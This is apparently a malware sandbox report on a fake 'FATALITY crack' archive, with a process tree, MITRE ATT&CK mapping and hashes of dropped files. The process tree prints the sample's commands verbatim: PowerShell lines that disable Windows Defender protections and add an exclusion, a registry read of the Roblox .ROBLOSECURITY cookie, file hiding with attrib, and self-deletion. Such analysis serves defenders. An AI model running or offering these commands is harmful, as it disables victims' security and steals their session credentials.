    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,8634180619132134656,5286107569553629055,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2168 /prefetch:8
    3⤵
    PID:952
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3104,i,8634180619132134656,5286107569553629055,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3188 /prefetch:1
    3⤵
    PID:5176
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,8634180619132134656,5286107569553629055,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3208 /prefetch:1
    3⤵
    PID:4396
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3528,i,8634180619132134656,5286107569553629055,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4396 /prefetch:1
    3⤵
    PID:2476
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4844,i,8634180619132134656,5286107569553629055,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4804 /prefetch:8
    3⤵
    - Drops file in System32 directory
    PID:6404
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4960,i,8634180619132134656,5286107569553629055,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5072 /prefetch:8
    3⤵
    PID:6936
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4324,i,8634180619132134656,5286107569553629055,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=212 /prefetch:8
    3⤵
    PID:7088

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3184

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1480

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4392

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5128
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\FATALITY crack.rar"
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - Modifies registry class
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4452
- - C:\Users\Admin\AppData\Local\Temp\7zO461ABEEE\Fatality.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO461ABEEE\Fatality.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID:5920
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:4464
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\7zO461ABEEE\Fatality.exe"
      4⤵
      Views/modifies file attributes
      PID:2164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO461ABEEE\Fatality.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:880
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      PID:1036
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:5500
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:3240
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5992
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1172
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\7zO461ABEEE\Fatality.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:5192
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6040
- - C:\Users\Admin\AppData\Local\Temp\7zO461FB6AF\Fatality.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO461FB6AF\Fatality.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID:4612
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:5644
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\7zO461FB6AF\Fatality.exe"
      4⤵
      Views/modifies file attributes
      PID:1412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO461FB6AF\Fatality.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6188
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6352
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:6528
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      PID:6712
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:6784
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:6844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6908
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:7052
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\7zO461FB6AF\Fatality.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:7140
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6152

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:2748

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:6108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4200

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Component Object Model Hijacking

T1546.015

Privilege Escalation

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Component Object Model Hijacking

T1546.015

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Uninstall Tool\PinToTaskbar.exe

Filesize
386KB

MD5
4de7220115fe537eaf6c5776e83f0064

SHA1
e81a7feab77203266a8afb379ff93025c923f28b

SHA256
e87288744cc29c5ab81d9c3fa78653cacd87bc74bf5a3abc4f38afcd6a1a5c16

SHA512
b33113314636a491c35dea215c3cd75f74797223d5b6b7ca88b790b9ddc9969c8759b61e354e753db2476dd65953664cf321940be811c6c9fc01391f0490c02f

Download Submit
C:\Program Files\Uninstall Tool\UninstallTool.exe

Filesize
5.6MB

MD5
3314588abbe3e7e976ca664886e691b8

SHA1
91ab07ccf95e087c3878c3e2d93941e561ed979a

SHA256
6095e41aed91326a12acd02ae988711befd3e3ad2d280ca5d0c2647cb0f781f1

SHA512
77fbc216f0c6633f39ba6e0490358276e977e7dc981e7f164328a92f5a014d90b1aaf41819519bd3313b8ddfded4b98c069eaae15f2057e5f42d8177facc700f

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\sStNH.scr

Filesize
230KB

MD5
d46ab20231100babf7684a773b61320c

SHA1
0eb6377b9cc15e750f06a202f0d5c6ff31020e31

SHA256
b0b8d288c4f6d7d623beebd55c44f22872ac30c9991d627b19c9d2b77a69d889

SHA512
154cdd3e8557615bec8474f2bb169d0ac873a3e49a1c6cd68262828745e12e1cedd4e635b547580c1b494f2586c0174f07cc3b95de84d722dfcd287c09d59433

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
dc90645ce9faea0d893f3713ffde2f50

SHA1
b57ad2d9cb82eb6b258612c243a638e562e7fb92

SHA256
8976c638202a302182aa9e2c26f484828646dfd4baeaad4f644cea21ba493294

SHA512
820c7de32bf4013d5076ef4db7ae0eeea8d340a55de3b53582e2df8a7892bd89923ec91ae14a8dead7969e097cd44c2373dbf1fe794c76648b30fa6e5c401d2a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
71a7124477ec82ce788f0f6f97d8454c

SHA1
e0d11581e4ed42287d37d414852dad845642a9dc

SHA256
2afd1bba7a6ad0e0fe9ed0ff1711309eb0e8cfe57cb737abc7b290bf0178ee00

SHA512
3142172357d81ef15d00d96da6440aafb94ebf26fd73e61a32ae1f93d7dd43743fe87d75d1c0d830d8ca3dac53364e6d7b1039ce1233616229099f2304513f68

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
677a0157f7bbe8252e60899eeb9cf226

SHA1
ba4bcb0ba2b5eba0cae106898e263d097bc95c65

SHA256
b8878ec5661f96dd91435cf094cba6e879802293cfe040e87e416fb6de3b50df

SHA512
494068ea00c64ef688b40b8e6a317fe5b1f1822c56956f03187dd1aad8984401b31836f5c0bfe9ff0deb9ce6b83b7f8f738757c8bcb50f7f092b599a4ef67dea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
ed810b1a3b4fc770ec63b6290c444ed2

SHA1
712dde6efdfcf018ccc7983f59f650eab0ca0ec6

SHA256
12ed0e26a6ec2baa98a363178f66463f2902fd9cc703d719315d023f6b3ec792

SHA512
1141b5e518ed63b0d86e40c8275c08c5a7135426d0d4598a405b4d3fe69dec0556cd30ce4c6c29015fb55d91ea912fb772a75f2d1936c31ba53e2eb48e46fabe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
5fe56f33c16010af55087ec47f77709a

SHA1
e6fc7623ee415ca46fc7b3028b6c261a4f6c5ef4

SHA256
b97ba659216cb7d845dc8749c0d34dbdab9e706491678ae46905bbab0b7bbd43

SHA512
d354a3bd116d958d84fe7839a418df5e49935190e1da3d5acf5c6da23210a09cbe203e2a9a485e987f9c09cd3ccbd6c5f117bc0627e1b87563d7337e5a8939ec

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
7c4b20068fe3cda439ee3e2fbe3cb00e

SHA1
5ef3811228b10cfe8245e6517948eaf13647cb27

SHA256
9796c660a36c9b3a5aca527271f62038abe8911ab74a2e5d4cf730f686980e44

SHA512
f900597537dc5dbaa47afde7049d2b7caba482803971620aaf47bd5ed6fe01e3ab71b1d8cb31b724fad3d7b8ef9c7590c1eb8f7e88d46d05fedac2aaa7a892eb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
7544d02d561564a0215797c9c465109f

SHA1
fc3f8938e5dc54d2b2f6cf2eb38e497a951279f3

SHA256
2e89f1a12e7b2294d9bf1fcac098f87d1d3bc752fd382244225e96e893661d1b

SHA512
dadc7a746993045206ea72e47b5fc7760aa92a8d88fc1fc5b3fa7d36e6c0721c9be239982a19cbdfb5d04fd954a3bda963adb1fc00e307d9ec933f2984e765f9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
ceb9494c872d58429a28bc79c1397abd

SHA1
275aac667fd5071d6a358a9d994c939ef1e852b5

SHA256
acbd61e93a0450168435d542eed9525ca47b0a08b7ec076bea13ed1e1602a41b

SHA512
86d693095cacbf3c1bfa923482cadca7ee26ea681de363475189672b887a4eedc7ffe77666cb4b167f4d0ae540819b04333ea5a3b55340b5447040cec253eef6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
ab438d6ac872f6d9f2368d6d51e0bf0f

SHA1
124b73afd15e897c588702decffc8824ee248d2e

SHA256
7c960a7eacf16a59b04ebbe700c80e87b450bc32118030eab6db3d8cd653976e

SHA512
fc4df8c640f98ee361a53f997cf4d26a2b8aa4e59a084601c532383d8a90a542c8408026d0e62f61d93e06e8b72956f5ebe62e8b6b1237b5f19253822609363b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
2413ea82f36c6399a863853ab5eea2ee

SHA1
b26a03ab7de299728ccb9ec9ef08bb213dca03f4

SHA256
6ea9ff67e144cf7d2ebd9caca8d9d8be5fe22fb7d9640c6e0be25541ffde775c

SHA512
789e443b83e5b6f5bd3b221df6a29ce4602561c72c3861a11985ba6baf4b25c01c18f73e9a043597da0794a8d5a25156da72bf7cd218461121d79b95e35c6e80

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
3c3ecc9d77060d5d7e04d0173ba57990

SHA1
96635d6f2eb7a549aa24b5b6491a322e15dacf31

SHA256
a421353a3a004e207783dbb879c4cb03dbe67ae801103b4e9369fa4965e0e3f2

SHA512
864a5e026d1353d2e6daaf095187ce1d284f51590e3a9f7dc05b1d79c025ca98e28709cbe8e70e5d89c4f110b4ed35ae64a3fbcc5a390f8556f1f62b8d7e7a29

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
dae6215ce9f7ef23db72f48013b0bbbd

SHA1
54f5d4750c3157569ee3d837340a25e5069ed28b

SHA256
220e63ac2288c2545fcab8493ab28101b66dd1307159922d540c64a574b0d354

SHA512
5b6031bb37244d7f180691fc12065e57f3c98daf01a67c30f4f34f0c35ce79a10b41b4619a79b46753fa4660f5c97853aa7fbaf82389d6aff545aa58fffecef5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
b706034ad9a4e7cac8be392bd6b8c80e

SHA1
a7251bb58d0d127a9731145820971e9dab1cea84

SHA256
fea35a08751bdf05441f5140855616b658f04e992dbf50ba7ee189b4fbf1451e

SHA512
3600c8cfde243cd15b602170f4e6cc3489c768f37b52c1716b1b7937e9a35bdbf16bec3cee7de2e548208c18c081ec00ba462fd47a8478d9960fb94252ca1e52

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
361c764da025469c9362cc64aaca0019

SHA1
cb4e7ad07eb3288c52540d0ef726792ebcda947c

SHA256
771245c41ab4baaa1ec1a691ecf2b1e4c1618a64928948abd937a5578e946b9f

SHA512
e6285132d4d894a20e0108d3fb8909d87b3ddf7951355a85b952728b3a2f0ad550846dc971591d6bc4c277c01b45440296276ac90ac46994e4bd6a6cf131fbd2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
195KB

MD5
b9a4e5e9ff7080ca3854b2bd466e00f7

SHA1
b1c14d813540126b89f112e814fd1b881365e6ce

SHA256
0ed8b54f7837ffa55d209df0909fdb8f84c7e4b94e85c58b86ab62bede807fc2

SHA512
23cf9d427f81a3a976e80d587b6a9f7bdbcdbf14b5486e10d8e794b96a42012f6753a153e7159e20f4edcd951d00cd330064a1b2989e278d28fa19e86e9a40f8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
195KB

MD5
4cb6b812e40ca563aa519dbd43a85eaa

SHA1
e91f06d3f1bdaa52878048dd7e40d7b8a49b68bc

SHA256
30074a22142c46cf781e98396bf0772f6e7472d3f82ac1e24ceb739eb7a51c1b

SHA512
6f33825e667edf861151cd75373af297d2d456994188f74625e2b2148c90e5141f910ab472fcb21866895d39ae125e44c7f8deddae31df4701bfd4d874d64c2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d30a5618854b9da7bcfc03aeb0a594c4

SHA1
7f37105d7e5b1ecb270726915956c2271116eab7

SHA256
3494c446aa3cb038f1d920b26910b7fe1f4286db78cb3f203ad02cb93889c1a8

SHA512
efd488fcd1729017a596ddd2950bff07d5a11140cba56ff8e0c62ef62827b35c22857bc4f5f5ea11ccc2e1394c0b3ee8651df62a25e66710f320e7a2cf4d1a77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
03a56f81ee69dd9727832df26709a1c9

SHA1
ab6754cc9ebd922ef3c37b7e84ff20e250cfde3b

SHA256
65d97e83b315d9140f3922b278d08352809f955e2a714fedfaea6283a5300e53

SHA512
e9915f11e74c1bcf7f80d1bcdc8175df820af30f223a17c0fe11b6808e5a400550dcbe59b64346b7741c7c77735abefaf2c988753e11d086000522a05a0f7781

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
32KB

MD5
057478083c1d55ea0c2182b24f6dd72f

SHA1
caf557cd276a76992084efc4c8857b66791a6b7f

SHA256
bb2f90081933c0f2475883ca2c5cfee94e96d7314a09433fffc42e37f4cffd3b

SHA512
98ff4416db333e5a5a8f8f299c393dd1a50f574a2c1c601a0724a8ea7fb652f6ec0ba2267390327185ebea55f5c5049ab486d88b4c5fc1585a6a975238507a15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
20KB

MD5
e648b4f809fa852297cf344248779163

SHA1
ea6b174e3bca31d6d29b84ffbcbcc3749e47892e

SHA256
637f545351fbed7e7207fdf36e1381b0860f12fffde46a6fa43bdafcc7a05758

SHA512
a2240d4a902c8245e3ffebd0509e25dd5005d0e6f075f5c78a46095b9a52d86ed483583a2a8b39f1ad4e610d2f7ec63e4ef8eab89936d30da937690936ef4f12

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001a

Filesize
209KB

MD5
3e552d017d45f8fd93b94cfc86f842f2

SHA1
dbeebe83854328e2575ff67259e3fb6704b17a47

SHA256
27d9c4613df7a3c04da0b79c13217aa69992b441acb7e44bf2a7578ca87d97d6

SHA512
e616436f2f15615429c7c5c37de3990c3e86c5e1da7d75a0f524fc458b75d44a5be1a3648a628d63e1cf8aa062e08b538f2f2bc9c6a0b42157beb24f82c571d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d

Filesize
20KB

MD5
4588208961b6b7ed6cd974687346348a

SHA1
52085a4f6c875b6949261704f05050c1727e9c55

SHA256
95a95b07b4e0d051f83a51b680810572bd1244b42cb6e640d3b29b98f3e92885

SHA512
a9853353e68286f62535548ddbf1a97f1b39c1b6200161a660b1a4eac6864a1f6e93ab72d2cfe61249bf4543e2317f04babb3be211a37c12a55d55ee08b2b515

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

Filesize
29KB

MD5
28198fab85f1ac98f664600f670ba43d

SHA1
ee0dd46d793071270130c08412258d8c32194a32

SHA256
81bd52c3dd2417f30deadecbe5412bed404a86e05233b7b7ba6b7e8f682b5b49

SHA512
a1b3ff8361213c15bb077a3b9d31e9cb8b7705d04f2815395c13365972ca94e798f11532df48583fb3792df329d2a98ec903aa0457841da34f062f170de5d921

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f

Filesize
23KB

MD5
82db06ca267ac7fdd878a1df35f41f4e

SHA1
9dae7f1ae60d7b83dbdada64fd1b4296f8f20051

SHA256
3847721350fd764d4d21cb4d2e02ab95c4ccdaa9d8ffefeb6f1078bf169ac6fb

SHA512
6e9beeca7caa94fc5dcf929d5af18d24acfc2a56612840b7084fb6057785d85b272eec8acdf4457c7dd1de9bee5e03fefc082a170131002229da0c01da9a8fb8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020

Filesize
23KB

MD5
cd7b3e4dfecea7028bc1bdeda5a47477

SHA1
5c37dcaa4ed3c2a4051e4dc1714a342ac0de8365

SHA256
4d401337713e7f1c9f6588f8f7d79721e531c837b5f2f73c0b3cb372fd8f9b87

SHA512
ea11eb8d8347a39a1aa990a05cce6543e47145a1e618091750e2ad77497449e12e8b4d5b1e3385c9669cdd6a66e7dac96ff0e67913730c27c0ef2ff40a669f2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000022

Filesize
88KB

MD5
f64473f7f0d77763bf319a920044a5fe

SHA1
085e34089773af2ec9ec67f206d51e9ada6a84fb

SHA256
d0ce3ff70f038c52fd30f79350f60b4dff5c9bf0f327a1389c83c409a1f8846d

SHA512
25a85139b51b7b1e45a30c3cb8a5f53d7c7c09d7a636236a2abe56e7737c5ff1b7481d2d71ccdee2959c480cece1f753acc27998c1cb981c989b5b03aec5a20a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024

Filesize
31KB

MD5
8e2a0e56ae25b282b437f9d5bd300d96

SHA1
5d4ba26731ee84ba9bbc5487312162b826ede550

SHA256
b48a7837a73459a7d6f545cb45a810533d9bf006a54077b2ca3bd62dd6f6315d

SHA512
a2529efb9941f92a6c84c40214bc9c7c97ab70dd69040238b82f9422bfb5424b41e3f56146017c4a9fdb545b17f84058e03c8179fd4f6385e542d799df5d7a4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000025

Filesize
72KB

MD5
